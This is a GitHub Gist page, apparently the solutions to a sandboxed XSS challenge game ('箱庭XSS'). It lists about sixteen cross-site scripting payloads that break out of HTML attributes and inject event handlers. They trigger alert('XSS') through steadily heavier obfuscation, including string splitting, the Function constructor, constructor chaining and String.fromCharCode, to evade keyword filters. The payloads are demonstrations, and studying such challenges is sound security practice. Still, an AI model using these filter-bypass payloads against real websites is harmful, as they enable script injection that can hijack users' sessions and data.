Skip to content

Instantly share code, notes, and snippets.

@st98

st98/xss Secret

Last active January 4, 2016 13:39
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save st98/b51f263a24399205edcb to your computer and use it in GitHub Desktop.
Save st98/b51f263a24399205edcb to your computer and use it in GitHub Desktop.
箱庭XSS。
"><script>alert('XSS')</script>
"onclick="window['a'+'lert']('X'+'SS')
"onfocus="Function('al'+'ert('+'\'XS'+'S\')')()
"onblur="0..constructor.constructor('a'+'l'+'e'+'rt('+'\'X'+'S'+'S\')')()
"onchange="0['const'+'ructor']['const'+'ructor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onkeydown="0['con'+'s'+'t'+'r'+'u'+'ctor']['con'+'s'+'t'+'r'+'u'+'ctor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onkeyup="0['co'+'n'+'s'+'t'+'r'+'u'+'c'+'tor']['co'+'n'+'s'+'t'+'r'+'u'+'c'+'tor']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmousemove="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmousedown="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmouseover="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmouseout="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmouseup="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onkeypresssrts="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onmove="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"ondrag="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+'\'X'+'S'+'S\')')()
"onselect="0['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']['c'+'o'+'n'+'s'+'t'+'r'+'u'+'c'+'t'+'o'+'r']('a'+'l'+'e'+'r'+'t('+String['fromChar'+'C'+'ode'](39,88,83,83,39)+')')()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment